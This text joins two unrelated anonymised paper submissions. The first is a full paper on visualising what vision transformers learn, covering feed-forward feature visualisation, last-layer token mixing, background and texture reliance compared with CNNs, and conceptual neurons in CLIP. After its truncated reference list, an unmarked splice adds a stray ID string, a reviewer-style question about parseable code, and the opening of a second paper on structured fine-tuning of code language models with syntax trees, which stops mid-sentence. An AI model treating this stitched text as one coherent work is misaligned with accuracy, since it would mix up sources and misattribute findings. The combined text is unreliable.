What do Vision Transformers Learn? A Visual Exploration Anonymous authors Paper under double-blind review Abstract Vision transformers (ViTs) are quickly becoming the de-facto architecture for computer vision, yet we understand very little about why they work and what they learn. While existing studies visually analyze the mechanisms of convolutional neural networks, an analogous exploration of ViTs remains challenging. In this paper, we first address the obstacles to performing visualizations on ViTs. Assisted by these solutions, we observe that neurons in ViTs trained with language model supervision (e.g., CLIP) are activated by semantic concepts rather than visual features. We also explore the underlying differences between ViTs and CNNs, and we find that transformers detect image background features, just like their convolutional counterparts, but their predictions depend far less on high-frequency information. On the other hand, both architecture types behave similarly in the way features progress from abstract patterns in early layers to concrete objects in late layers. In addition, we show that ViTs maintain spatial information in all layers except the final layer. In contrast to previous works, we show that the last layer most likely discards the spatial information and behaves as a learned global pooling operation. Finally, we conduct large-scale visualizations on a wide range of ViT variants, including DeiT, CoaT, ConViT, PiT, Swin, and Twin, to validate the effectiveness of our method. Figure 1: The progression for visualized features of ViT B-32. Features from early layers capture general edges and textures. Moving into deeper layers, features evolve to capture more specialized image components and finally concrete objects. 1 Introduction Recent years have seen the rapid proliferation of vision transformers (ViTs) across a diverse range of tasks from image classification to semantic segmentation to object detection [Dosovitskiy et al., 2020; He et al., 2021; Dong et al., 2021; Liu et al., 2021; Zhai et al., 2021; Dai et al., 2021]. Despite their enthusiastic adoption and the constant introduction of architectural innovations, little is known about the inductive biases or features they tend to learn. While feature visualizations and image reconstructions have provided a looking glass into the workings of CNNs [Oláh et al., 2017; Zeiler & Fergus, 2014; Dosovitskiy & Brox, 2016], these methods have shown less success for understanding ViT representations, which are difficult to visualize. In this work we show that, if properly applied to the correct representations, feature visualizations can indeed succeed on ViTs. This insight allows us to visually explore ViTs and the information they glean from images. In order to investigate the behaviors of vision transformers, we first establish a visualization framework that incorporates improved techniques for synthesizing images that maximally activate neurons. By dissecting and visualizing the internal representations in the transformer architecture, we find that patch tokens preserve spatial information throughout all layers except the last attention block. The last layer of ViTs learns a token-mixing operation akin to average pooling, such that the classification head exhibits comparable accuracy when ingesting a random token instead of the CLS token. After probing the role of spatial information, we delve into the behavioral differences between ViTs and CNNs. When performing activation maximizing visualizations, we notice that ViTs consistently generate higher quality image backgrounds than CNNs. Thus, we try masking out image foregrounds during inference, and find that ViTs consistently outperform CNNs when exposed only to image backgrounds. These findings bolster the observation that transformer models extract information from many sources in an image to exhibit superior performance on out-of-distribution generalization (Paul & Chen, 2021) as well as adversarial robustness (Shao et al., 2021). Additionally, convolutional neural networks are known to rely heavily on high-frequency texture information in images (Geirhos et al., 2018). In contrast, we find that ViTs perform well even when high-frequency content is removed from their inputs. While vision-only models contain simple features corresponding to distinct physical objects and shapes, we find that language supervision in CLIP (Radford et al., 2021) results in neurons that respond to complex abstract concepts. This includes neurons that respond to visual characteristics relating to parts of speech (e.g. epithets, adjectives, and prepositions), a “music” neuron that responds to a wide range of visual scenes, and even a “death neuron” that responds to the abstract concept of morbidity. Our contributions are summarized as follows: I. We observe that uninterpretable and adversarial behavior occurs when applying standard methods of feature visualization to the relatively low-dimensional components of transformer-based models, such as keys, queries, or values. However, applying these tools to the relatively high-dimensional features of the position-wise feedforward layer results in successful and informative visualizations. We conduct large-scale visualizations on a wide range of transformer-based vision models, including ViTs, DeiT, CoaT, ConViT, PiT, Swin, and Twin, to validate the effectiveness of our method. II. We show that patch-wise image activation patterns for ViT features essentially behave like saliency maps, highlighting the regions of the image a given feature attends to. This behavior persists even for relatively deep layers, showing the model preserves the positional relationship between patches instead of using them as global information stores. III. We compare the behavior of ViTs and CNNs, finding that ViTs make better use of background information and rely less on high-frequency, textural attributes. Both types of networks build progressively more complex representations in deeper layers and eventually contain features responsible for detecting distinct objects. IV. We investigate the effect of natural language supervision with CLIP on the types of features extracted by ViTs. We find CLIP-trained models include various features clearly catered to detecting components of images corresponding to caption text, such as prepositions, adjectives, and conceptual categories. 2 RELATED WORK 2.1 OPTIMIZATION-BASED VISUALIZATION One approach to understanding what models learn during training is using gradient descent to produce an image which conveys information about the inner workings of the model. This has proven to be a fruitful line of work in the case of understanding CNNs specifically. The basic strategy underlying this approach is to optimize over input space to find an image which maximizes a particular attribute of the model. For example, Erhan et al. (2009) use this approach to visualize images which maximally activate specific neurons in early layers of a network, and Olah et al. (2017) extend this to neurons, channels, and layers throughout a network. Simonyan et al. (2014); Yin et al. (2020) produce images which maximize the score a model assigns to a particular class. Mahendran & Vedaldi (2015) apply a similar method to invert the feature representations of particular image examples. Recent work Ghiasi et al. (2021) has studied techniques for extending optimization-based class visualization to ViTs. We incorporate and adapt some of these proposed techniques into our scheme for feature visualization. 2.2 Other Visualization Approaches Aside from optimization-based methods, many other ways to visualize CNNs have been proposed. Dosovitskiy & Brox (2016) train an auxiliary model to invert the feature representations of a CNN. Zeiler & Fergus (2014) use ‘deconvnets’ to visualize patches which strongly activate features in various layers. Simonyan et al. (2014) introduce saliency maps, which use gradient information to identify what parts of an image are important to the model’s classification output. Zimmermann et al. (2021) demonstrate that natural image samples which maximally activate a feature in a CNN may be more informative than generated images which optimize that feature. We draw on some aspects of these approaches and find that they are useful for visualizing ViTs as well. 2.3 Understanding ViTs Given their rapid proliferation, there is naturally great interest in how ViTs work and how they may differ from CNNs. Although direct visualization of their features has not previously been explored, there has been recent progress in analyzing the behavior of ViTs. Paul & Chen (2021), Naseer et al. (2021), Shao et al. (2021) demonstrate that ViTs are inherently robust to many kinds of adversarial perturbations and corruptions. Raghuram et al. (2021) compare how the internal representation structure and use of spatial information differs between ViTs and CNNs. Chefer et al. (2021) produce ‘image relevance maps’ (which resemble saliency maps) to promote interpretability of ViTs. 3 ViT Feature Visualization Like many visualization techniques, we take gradient steps to maximize feature activations starting from random noise (Olah et al., 2017). To improve the quality of our images, we penalize total variation (Mahendran & Vedaldi, 2015), and also employ the jitter augmentation (Yin et al., 2020), the ColorShift augmentation, and augmentation ensembling (Ghiasi et al., 2021). Finally, we find that Gaussian smoothing facilitates better visualization in our experiments as is common in feature visualization (Smilkov et al., 2017; Cohen et al., 2019). Each of the above techniques can be formalized as follows. A ViT represents each patch \( p \) (of an input \( x \)) at layer \( l \) by an array \( A_{l,p} \) with \( d \) entries. We define a feature vector \( f \) to be a stack composed of one entry from each of these arrays. Let \( f_{l,i} \) be formed by concatenating the \( i \)th entry in \( A_{l,p} \) for all patches \( p \). This vector \( f \) will have dimension equal to the number of patches. The optimization objective starts by maximizing the sum of the entries of \( f \) over inputs \( x \). The main loss is then \[ L_{\text{main}}(x, l, i) = \sum_p (f_{l,i})_p. \] We employ total variation regularization by adding the term \( \lambda TV(x) \) to the objective. \( TV \) represents the total variation, and \( \lambda \) is the hyperparameter controlling the strength of its regularization effect. We can ensemble augmentations of the input to further improve results. Let \( A \) define a distribution of augmentations to be applied to the input image \( x \), and let \( a \) be a sample from \( A \). To create a minibatch of inputs from a single image, we sample several augmentations \( \{a_k\} \) from \( A \). Finally, the optimization problem is: \[ x^* = \arg\max_x \sum_k L_{\text{main}}(a_k(x), l, i) + \lambda TV(a_k(x)). \] We achieve the best visualizations when \( A \) is \( GS(CS(Jitter(x))) \), where \( GS \) denotes Gaussian smoothing and \( CS \) denotes ColorShift, whose formulas are: \[ GS(x) = x + \epsilon; \quad \epsilon \sim \mathcal{N}(0, 1) \] Figure 2: (a): Example feature visualization from ViT feed forward layer. Left: Image optimized to maximally activate a feature from layer 5. Center: Corresponding maximally activating ImageNet example. Right: The image’s patch-wise activation map. (b): A feature from the last layer most activated by shopping carts. \[ CS(x) = \sigma x + \mu; \quad \mu \sim U(-1, 1); \quad \sigma \sim e^{U(-1, 1)}. \] Note that even though \( \epsilon \) and \( \mu \) are both additive noise, they act on the input differently since \( \mu \) is applied per channel (i.e. has dimension three), and \( \epsilon \) is applied per pixel. For more details on hyperparameters, refer to Appendix C. To better understand the content of a visualized feature, we pair every visualization with images from the ImageNet validation/train set that most strongly activate the relevant feature. Moreover, we plot the feature’s activation pattern by passing the most activating images through the network and showing the resulting pattern of feature activations. Figure 2(a) is an example of such a visualization. From the leftmost panel, we hypothesize that this feature corresponds to gravel. The most activating image from the validation set (middle) contains a lizard on a pebbly gravel road. Interestingly, the gravel background lights up in the activation pattern (right), while the lizard does not. The activation pattern in this example behaves like a saliency map (Simonyan et al., 2014), and we explore this phenomenon across different layers of the network further in Section 4. The model we adopt for the majority of our demonstrations throughout the paper is ViT-B/16, implemented based on the work of Dosovitskiy et al. (2020). In addition, in the Appendix, we conduct large-scale visualizations on a wide range of ViT variants, including DeiT (Touvron et al., 2021a), CoaT (Xu et al., 2021), ConViT (d’Ascoli et al., 2021), PiT (Heo et al., 2021), Swin (Liu et al., 2021), and Twin (Chu et al., 2021), 38 models in total, to validate the effectiveness of our method. ViT-B/16 is composed of 12 blocks, each consisting of multi-headed attention layers, followed by a projection layer for mixing attention heads, and finally followed by a position-wise-feed-forward layer. For brevity, we henceforth refer to the position-wise-feed-forward layer simply as the feed-forward layer. In this model, every patch is always represented by a vector of size 768 except in the feed-forward layer which has a size of 3072 (4 times larger than other layers). We first attempt to visualize features of the multi-headed attention layer, including visualization of the keys, queries, and values, by performing activation maximization. We find that the visualized feed-forward features are significantly more interpretable than other layers. We attribute this difficulty of visualizing other layers to the property that ViTs pack a tremendous amount of information into only 768 features, (e.g. in keys, queries, and values) which then behave similar to multi-modal neurons, as discussed by Goh et al. (2021), due to many semantic concepts being encoded in a low dimensional space. Furthermore, we find that this behaviour is more extreme in deeper layers. See Figure 3 for examples of visualizations of keys, queries and values in both early and deep layers of Figure 3: Left: Visualization of key, query, and value. The visualization both fails to extract interpretable features and to distinguish between early and deep layers. High-frequency patterns and adversarial behavior dominate. Right: ViT feed forward layer. The first linear layer increases the dimension of the feature space, and the second one brings it back to its initial dimension. Figure 5: Feature activation maps in internal layers can effectively segment the contents of an image with respect to a semantic concept. For each image triple, the visualization on top shows the result of our method, the image on the bottom left is the most activating image from the validation set and the image on the bottom right shows the activation pattern. the ViT. Inspired by these observations, we visualize the features within the feed-forward layer across all 12 blocks of the ViT. We refer to these blocks interchangeably as layers. The feed-forward layer depicted in Figure 4 takes an input of size $d = 768$, projects it into a $t = 4$ times higher dimensional space, applies the non-linearity GELU, and then projects back to $d$ dimensional space. Unless otherwise stated, we always visualize the output of the GELU layers in our experiments. We hypothesize that the network exploits these high-dimensional spaces to store relatively disentangled representations. On the other hand, compressing the features into a lower dimensional space may result in the jumbling of features, yielding uninterpretable visualizations. 4 Last-Layer Token Mixing In this section, we investigate the preservation of patch-wise spatial information observed in the visualizations of patch-wise feature activation levels which, as noted before, bear some similarity to saliency maps. Figure 2(a) demonstrates this phenomenon in layer 5, where the visualized feature is strongly activated for almost all rocky patches but not for patches that include the lizard. Additional examples can be seen in Figure 5 and the Appendix, where the activation maps approximately segment the image with respect to some relevant aspect of the image. We find it surprising that even though every patch can influence the representation of every other patch, these representations remain local, even for individual channels in deep layers in the network. While a similar finding for CNNs, whose neurons may have a limited receptive field, would be unsurprising, even neurons in the first layer of a ViT have a complete receptive field. In other words, ViTs learn to preserve spatial information, despite lacking the inductive bias of CNNs. Spatial information in patches of deep layers has been explored in Raghu et al. (2021) through the CKA similarity measure, and we further show that spatial information is in fact present in individual channels. The last layer of the network, however, departs from this behavior and instead appears to serve a role similar to average pooling. We include quantitative justification to support this claim in Appendix section C. Figure 2(b) shows one example of our visualizations for a feature from the last layer that is activated by shopping carts. The activation pattern is fairly uniform across the image. For classification purposes, ViTs use a fully connected layer applied only on the class token (the CLS token). It is possible that the network globalizes information in the last layer to ensure that the CLS token has access to the entire image, but because the CLS token is treated the same as every other patch by the transformer, this seems to be achieved by globalizing across all tokens. Based on the preservation of spatial information in patches, we hypothesize that the CLS token plays a relatively minor role throughout the network and is not used for globalization until the last layer. To demonstrate this, we perform inference on images without using the CLS token in layers 1-11, Table 1: After the last layer, every patch contains the same information. “Isolating CLS” denotes the experiment where attention is only performed between patches before the final attention block, while “Patch Average” and “Patch Maximum” refer to the experiment in which the classification head is placed on top of individual patches without fine-tuning. Experiments conducted on ViT-B16. | | Accuracy | Natural Accuracy | Isolating CLS | Patch Average | Patch Maximum | |----------|----------|-----------------|---------------|---------------|--------------| | Top 1 | | 84.20 | 78.61 | 75.75 | 80.16 | | Top 5 | | 97.16 | 94.18 | 90.99 | 95.65 | meaning that in these layers, each patch only attends to other patches and not to the CLS token. At layer 12, we then insert a value for the CLS token so that other patches can attend to it and vice versa. This value is obtained by running a forward pass using only the CLS token and no image patches; this value is constant across all input images. The resulting hacked network that only has CLS access in the last layer can still successfully classify 78.61% of the ImageNet validation set as shown in Table 1. From this result, we conclude that the CLS token captures global information mostly at the last layer, rather than building a global representation throughout the network. We perform a second experiment to show this last-layer globalization behaviour is not exclusive to the CLS token, but actually occurs across every patch in the last layer. We take the fully connected layer trained to classify images on top of the CLS token, and without any fine-tuning or adaptation, we apply it to each patch, one at a time. This setup still successfully classifies 75.75% of the validation set, on average across individual patches, and the patch with the maximum performance achieves 80.16% accuracy (see Table 1), further confirming that the last layer performs a token mixing operation so that all tokens contain roughly identical information. Figure 6 contains a heat-map depicting the performance of this setup across spatial patches. This observation stands in stark contrast to the suggestions of Raghu et al. (2021) that ViTs possess strong localization throughout the entire network, and their further hypothesis that the addition of global pooling is required for mixing tokens at the end of the network. We conclude by noting that the information structure of a ViT is remarkably similar to a CNN, in the sense that the information is positionally encoded and preserved until the final layer. Furthermore, the final layer in ViTs appears to behave as a learned global pooling operation that aggregates information from all patches, which is similar to its explicit average-pooling counterpart in CNNs. 5 COMPARISON OF ViTs AND CNNs As extensive work has been done to understand the workings of convolutional networks, including similar feature visualization and image reconstruction techniques to those used here, we may be able to learn more about ViT behavior via direct comparison to CNNs. An important observation is that in CNNs, early layers recognize color, edges, and texture, while deeper layers pick out increasingly complex structures eventually leading to entire objects (Olah et al., 2017). Visualization of features from different layers in a ViT, such as those in Figures 1 and 7, reveal that ViTs exhibit this kind of progressive specialization as well. On the other hand, we observe that there are also important differences between the ways CNNs and ViTs recognize images. In particular, we examine the reliance of ViTs and CNNs on background and Figure 7: **Complexity of features vs depth in ViT B-32.** Visualizations suggest that ViTs are similar to CNNs in that they show a feature progression from textures to parts to objects as we progress from shallow to deep features. Foreground image features using the bounding boxes provided by ImageNet [Deng et al., (2009)]. We filter the ImageNet-1k training images and only use those which are accompanied by bounding boxes. If several objects are present in an image, we only take the bounding boxes corresponding to the true class label and ignore the additional bounding boxes. Figure 8(b) shows an example of an image and variants in which the background and foreground, respectively, are masked. ![Image](image.png) Figure 8: *(a): ViT-B16 detects background features.* Left: Image optimized to maximally activate a feature from layer 6. Center: Corresponding maximally activating example from ImageNet. Right: The image’s patch-wise activation map. *(b): An example of an original image and masked-out foreground and background.* Figure 8(a) displays an example of ViTs’ ability to detect background information present in the ImageNet dataset. This particular feature appears responsible for recognizing the pairing of grass and snow. The rightmost panel indicates that this feature is solely activated by the background, and not at all by the patches of the image containing parts of the wolf. To quantitatively assess each architecture’s dependence on different parts of the image on the dataset level, we mask out the foreground or background on a set of evaluation images using the aforementioned ImageNet bounding boxes, and we measure the resulting change in top-5 accuracy. These tests are performed across a number of pretrained ViT models, and we compared to a set of common CNNs in Table 2. Further results can be found in Table 3. We observe that ViTs are significantly better than CNNs at using the background information in an image to identify the correct class. At the same time, ViTs also suffer noticeably less from the removal of the background, and thus seem to depend less on the background information to make their classification. A possible, and likely, confounding variable here is the imperfect separation of the background from the foreground in the ImageNet bounding box data set. A rectangle containing the wolf in Figure 8(a), for example, would also contain a small amount of the grass and snow at the wolf’s feet. However, the foreground is typically contained entirely in a bounding box, so masking out the bounding box interiors is highly effective at removing the foreground. Because ViTs are better equipped to make sense of background information, the leaked background may be useful... Table 2: ViTs more effectively correlate background information with correct class. Both foreground and background data are normalized by full image top-5 accuracy. | Architecture | Full Image | Foreground | Background | |--------------|------------|------------|------------| | ViT-B32 | 98.44 | 93.91 | 28.10 | | ViT-L16 | 99.57 | 96.18 | 33.69 | | ViT-L32 | 99.32 | 93.89 | 31.07 | | ViT-B16 | 99.22 | 95.64 | 31.59 | | DeiT-B16 | 99.86 | 94.98 | 38.29 | | ConViT-B | 99.78 | 94.89 | 37.09 | | Swin-L4 | 99.67 | **97.04** | **44.50** | | EfficientNetB5 | 99.57 | 92.16 | 22.29 | | EfficientNetB6 | 99.29 | 92.52 | 23.05 | | EfficientNetB7 | 99.42 | 93.23 | 23.28 | | ResNet-50 | 98.00 | 89.69 | 18.69 | | ResNet-152 | 98.85 | 90.74 | 19.68 | | MobileNetv2 | 96.09 | 86.84 | 15.94 | | DenseNet121 | 96.55 | 89.58 | 17.53 | for maintaining superior performance. Nonetheless, these results suggest that ViTs consistently outperform CNNs when information, either foreground or background, is missing. Next, we study the role of texture in ViT predictions. To this end, we filter out high-frequency components from ImageNet test images via low-pass filtering. While the predictions of ResNets suffer greatly when high-frequency texture information is removed from their inputs, ViTs are seemingly resilient. See Figure [15] for the decay in accuracy of ViT and ResNet models as textural information is removed. 6 ViTs with Language Model Supervision Recently, ViTs have been used as a backbone to develop image classifiers trained with natural language supervision and contrastive learning techniques (Radford et al., 2021). These CLIP models are state-of-the-art in transfer learning to unseen datasets. The zero-shot ImageNet accuracy of these models is even competitive with traditionally trained ResNet-50 competitors. We compare the feature visualizations for ViT models with and without CLIP training to study the effect of natural language supervision on the behavior of the transformer-based backbone. The training objective for CLIP models consists of matching the correct caption from a list of options with an input image (in feature space). Intuitively, this procedure would require the network to extract features not only suitable for detecting nouns (e.g., simple class labels like ‘bird’), but also modifying phrases like prepositions and epithets. Indeed, we observe several such features that are not present in ViTs trained solely as image classifiers. Figure 9: Left: Feature optimization shows sharp boundaries, and maximally activating ImageNet examples contain distinct, adjacent images. Middle: Feature optimization and maximally activating ImageNet photos all show images from an elevated vantage point. Right: Feature optimization shows a crowd of people, but maximally activating images indicate that the repetition of objects is more relevant than the type of object. Figure 9(a) shows the image optimized to maximally activate a feature of a ViT CLIP model alongside its two highest activating examples from the ImageNet dataset. The fact that all three images share sharp boundaries indicates this feature might be responsible for detecting caption texts relating to a progression of images. Examples could include “before and after,” as in the airport images or the adjective “step-by-step” for the iPod teardown. Similarly, Figure 9(b) and 9(c) depict visualizations from features which seem to detect the preposition “from above”, and adjectives relating to a multitude of the same object, respectively. The presence of features that represent conceptual categories is another consequence of CLIP training. Unlike ViTs trained as classifiers, in which features detect single objects or common background information, CLIP-trained ViTs produce features in deeper layers activated by objects in clearly discernible conceptual categories. For example, the top left panel of Figure 10(a) shows a feature activated by what resembles skulls alongside tombstones. The corresponding seven highly activating images from the dataset include other distinct objects such as bloody weapons, zombies, and skeletons. From a strictly visual point of view, these classes have very dissimilar attributes, indicating this feature might be responsible for detecting components of an image relating broadly to morbidity. In Figure 10(b), we see that the top leftmost panel shows a disco ball, and the corresponding images from the dataset contain boomboxes, speakers, a record player, audio recording equipment, and a performer. Again, these are visually distinct classes, yet they are all united by the concept of music. Given that the space of possible captions for images is substantially larger than the mere one thousand classes in the ImageNet dataset, high performing CLIP models understandably require higher level organization for the objects they recognize. Moreover, the CLIP dataset is scraped from the internet, where captions are often more descriptive than simple class labels. 7 DISCUSSION In order to dissect the inner workings of vision transformers, we introduce a framework for optimization-based feature visualization. We then identify which components of a ViT are most amenable to producing interpretable images, finding that the high-dimensional inner projection of the feed-forward layer is suitable while the key, query, and value features of self-attention are not. Applying this framework to said features, we observe that ViTs preserve spatial information of the patches even for individual channels across all layers with the exception of the last layer, indicating that the networks learn spatial relationships from scratch. We further show that the sudden disappearance of localization information in the last attention layer results from a learned token mixing behavior that resembles average pooling. In comparing CNNs and ViTs, we find that ViTs make better use of background information and are able to make vastly superior predictions relative to CNNs when exposed only to image backgrounds despite the seemingly counter-intuitive property that ViTs are not as sensitive as CNNs to the loss of high-frequency information, which one might expect to be critical for making effective use of background. We also conclude that the two architectures share a common property whereby earlier layers learn textural attributes, whereas deeper layers learn high level object features or abstract concepts. Finally, we show that ViTs trained with language model supervision learn more semantic and conceptual features, rather than object-specific visual features as is typical of classifiers. REPRODUCIBILITY STATEMENT We make our code repository available at: https://github.com/anonymous2023iclr/ViTVis REFERENCES Hila Chefer, Shir Gur, and Lior Wolf. Transformer interpretability beyond attention visualization. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 782–791, 2021. Xiangxiang Chu, Zhi Tian, Yuqing Wang, Bo Zhang, Haibing Ren, Xiaolin Wei, Huaxia Xia, and Chunhua Shen. Twins: Revisiting the design of spatial attention in vision transformers. arXiv preprint arXiv:2104.13840, 1(2):3, 2021. Jeremy Cohen, Elan Rosenfeld, and Zico Kolter. Certified adversarial robustness via randomized smoothing. In International Conference on Machine Learning, pp. 1310–1320. PMLR, 2019. Zihang Dai, Hanxiao Liu, Quoc V Le, and Mingxing Tan. Coatnet: Marrying convolution and attention for all data sizes. arXiv preprint arXiv:2106.04803, 2021. Stéphane d’Ascoli, Hugo Touvron, Matthew Leavitt, Ari Morcos, Giulio Biroli, and Levent Sagun. Convit: Improving vision transformers with soft convolutional inductive biases. arXiv preprint arXiv:2103.10697, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Xiaoyi Dong, Jianmin Bao, Ting Zhang, Dongdong Chen, Weiming Zhang, Lu Yuan, Dong Chen, Fang Wen, and Nenghai Yu. Peco: Perceptual codebook for bert pre-training of vision transformers. arXiv preprint arXiv:2111.12710, 2021. Alexey Dosovitskiy and Thomas Brox. Inverting visual representations with convolutional networks. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 4829–4837, 2016. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2020. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale, 2021. Dumitru Erhan, Yoshua Bengio, Aaron Courville, and Pascal Vincent. Visualizing higher-layer features of a deep network. University of Montreal, 1341(3):1, 2009. Robert Geirhos, Patricia Rubisch, Claudio Michaelis, Matthias Bethge, Felix A Wichmann, and Wieland Brendel. Imagenet-trained cnns are biased towards texture; increasing shape bias improves accuracy and robustness. arXiv preprint arXiv:1811.12231, 2018. Amin Ghiasi, Hamid Kazemi, Steven Reich, Chen Zhu, Micah Goldblum, and Tom Goldstein. Plug-in inversion: Model-agnostic inversion for vision with data augmentations. 2021. Gabriel Goh, Nick Cammarata, Chelsea Voss, Shan Carter, Michael Petrov, Ludwig Schubert, Alec Radford, and Chris Olah. Multimodal neurons in artificial neural networks. Distill, 6(3):e30, 2021. Kaiming He, Xinlei Chen, Saining Xie, Yanghao Li, Piotr Dollár, and Ross Girshick. Masked autoencoders are scalable vision learners. arXiv preprint arXiv:2111.06377, 2021.
YKIGyf215Q
- How do you assess the cost/benefit trade-off of (a) requiring parseable code and (b) increasing the length of the program's representation in terms of tokens given that the most common use-case of LLMs for code is code generation, often in incomplete contexts.
Structured Fine-Tuning Enables Data-Efficient Adaptation of Code Language Models Anonymous authors Paper under double-blind review Abstract Current models tailored for code tasks often adopt the successful pre-training-then-fine-tuning paradigm from natural language processing, treating source code in plain text as in natural language. This approach, however, overlooks the well-defined and unambiguous structures inherent in programming languages. In this work, we explore a data-efficient adaptation of pre-trained code language models by further training and fine-tuning them with program structures, which significantly improve the performance of the downstream coding tasks. Specifically, we represent programs as parse trees, also known as concrete syntax trees (CSTs), and refine a model with serialized CSTs. Fine-tuning with structures encourages the model to learn not only the associations of code text in different languages but also the mappings of their structures and grammars, by using only a small amount of data (e.g., 100 examples). With a focus on generation, we design training objectives for encoder-decoder and decoder-only architectures. We rigorously evaluate the proposed approach on various coding tasks and demonstrate that integrating parse structures with the plain-text representation of source code offers notable advantages, particularly in scenarios of low-data code translation. 1 Introduction Natural language models consider text as a sequence of tokens, which can be encoded and decoded using neural sequence models. With the attention mechanism considered to be “all you need” [Vaswani et al., 2017], natural language models are extended to programming languages by treating source code as plain text, such that one would conveniently reuse existing self-learning approaches (e.g., masked-token recovery, next-token prediction) for pretraining and fine-tuning. Adapting models from natural languages to code requires mainly curating training data that includes sufficient code. This simple adaptation works well, as demonstrated by the remarkable performance of various code language models [Wang et al., 2021; Chen et al., 2021; Li et al., 2023]. We argue, however, that source code inherits well-defined structures that may be leveraged to enhance the performance of coding tasks. These structures unveil the compositional semantics of code, thereby fostering the learning of compositional solutions within neural models, if properly modelled. Unlike natural languages, where obtaining syntax structure can be challenging due to intrinsic ambiguity, programming languages come with grammar and compilers that can unambiguously and efficiently parse a program. The resulting parse tree, a concrete syntax tree (CST), is only one example of a program’s various structural representations. Other well-studied structures in the field of program analysis include, for example, abstract syntax trees (ASTs), control flow graphs [Allen, 1970], program dependence graphs [Ferrante et al., 1987], code property graphs [Yamaguchi et al., 2014], control dependence graphs [Cytron et al., 1991], and system dependence graphs [Graf, 2010]. All these representations structure a program and offer additional insights beyond the sequence representation. Many of these representations and variants have been exploited for program understanding and vulnerability analysis, often paired with graph neural networks or graph transformers because they are capable of encoding structured data [Allamanis et al., 2018; Zügner et al., 2021]. For a similar reason, structural representations should also help code–code translation and text–code generation tasks, when a model learns not only the association of text but also the mapping between structures. This work advocates using CSTs to adapt pre-trained models for coding tasks. The focus on using CSTs rather than other structures comes with several reasons. First, most important tasks require decoding a program (such as code translation and generation). It is unclear how one can deduce a program from various graph representations of code; it is also challenging if one works on the ASTs. Second, off-the-shelf CST parser generators exist for many languages, and the support for additional languages is expected to grow (Tree-sitter). Tooling support contributes to the feasibility and practicality of using CSTs. Third, being a tree, a CST can be converted to and from a sequence by using an easily defined invertible mapping. Such a property allows reusing the model architecture (i.e., Transformer) that encodes and decodes sequences without modification. In this work, we will explore both conversion directions of tree serialization and de-serialization for sequence modeling of code (in Section 3.2). Building on the notable benefits of CSTs as a structural representation, we advocate their use for continual pre-training and fine-tuning a pre-trained language model for coding tasks. First, we formulate pre-training objectives that leverage the extensive structural information of CSTs, enhancing the structural understanding of code within pre-trained sequence models. Subsequently, we develop structured fine-tuning that enables quick adaptation at minimal costs, requiring significantly less data than plain-text code. This approach is particularly advantageous when working with low-resource languages where monolingual data is sparse and parallel data is even more scarce; it is also beneficial when collecting sufficient data for a downstream task is difficult. While in-context learning offers an alternate solution, it often falls short, especially when accessing a large model is beyond one’s limited budget. In this work, we demonstrate that in the low-data scenario, fine-tuning with structures can outperform not using structures by as much as 15 BLEU points and 8 CodeBLEU points for the Java-C# code translation task (both directions) using only 100 training examples. Similarly, in the text-to-code generation task for the MBPP dataset, employing structures with only 100 training examples significantly improves the pass@1 metric, increasing it from 1.68% to 4.40%. The contributions of this work can be summarized as follows. 1. We introduce a novel approach for the structured pre-training and fine-tuning of pre-trained language models. In particular, we explore the serialized form of CST, considering its suitability as an output format of code for decoding, beyond merely facilitating representation learning. 2. Our structured pre-training and fine-tuning method is applicable to both encoder-decoder and decoder-only models. Through empirical experiments with both types of models, we have observed consistent and beneficial results from our approach. 3. We demonstrate that structured fine-tuning allows data-efficient adaptation of pre-trained models, compared with a usual fine-tuning that treats source code as plain text. In particular, with small training data, using structures generally improves the performance of a variety of tasks, including code translation, generation, and summarization. 2 RELATED WORKS Machine Learning for Code Early approaches applied statistical learning methods to programming tasks (Nguyen et al., 2013; Movshovitz-Attias & Cohen, 2013; Raychev et al., 2014; Allamanis et al., 2014). With the advent of deep learning, deep neural networks gradually replaced pure statistical approaches (Allamanis et al., 2016; Mou et al., 2016; Gu et al., 2016; Iyer et al., 2016). However, these models were often task-specific and were trained on particular datasets, limiting their adaptability to custom tasks. More recently, with the increasing popularity of pre-trained models in natural language processing, similar pre-trained models for code were introduced. Among the pioneering efforts, Kanade et al. (2020) trained a BERT-based model on a large-scale Python dataset and showed improved performance on multiple downstream tasks with limited fine-tuning. Subsequently, multiple pre-trained models with varying architectures, data composition, and code representations were proposed. Notable examples include CodeBERT (Feng et al., 2020), GraphCodeBERT (Guo et al., 2020), PLBART (Ahmad et al., 2021), CodeT5 (Wang et al., 2021), UniXCoder (Guo et al., 2022), CodeGen (Nijkamp et al., 2022), and StarCoder (Li et al., 2023). Incorporating Structured Representations for Code Given that code can be represented by structures such as syntax or parse trees, data flows, and execution flows, several works explored Figure 1: A representative Python program along with its CST (simplified for illustration) in the tree and serialized forms, respectively. Also illustrated are the masked subtree prediction and masked node prediction training objectives we propose to adapt encoder-decoder models to code structures. Various approaches to integrate these structures into code models. For instance, Mou et al. (2016) introduced a convolutional kernel applied to the program’s AST. Phan et al. (2017) proposed leveraging the program’s execution flow in combination with graph-based CNNs for software defect prediction. Meanwhile, Hu et al. (2018) proposed converting an AST into a sequence using tree traversal and employing LSTM to generate code comments. Zhou et al. (2019) utilized composite code representations including the AST, control flow, data flow, and natural code sequence for vulnerability detection. To incorporate code structures into the Transformer architecture, prior works introduced novel positional encodings that represent node positions within the tree (Shiv & Quirk, 2019; Peng et al., 2022); or they utilized syntax or parse tree traversals or path information to provide structural information to the model (Kim et al., 2021; Wang & Li, 2021; Peng et al., 2021; Jiang et al., 2021; Guo et al., 2020). Additionally, specific tree-based attention mechanisms have been proposed (Tang et al., 2022; Wang et al., 2023). In all the aforementioned works, regardless of whether the code structure is incorporated or not, models treat source code as plain text during downstream tasks. In contrast, we propose to not only encode but also decode 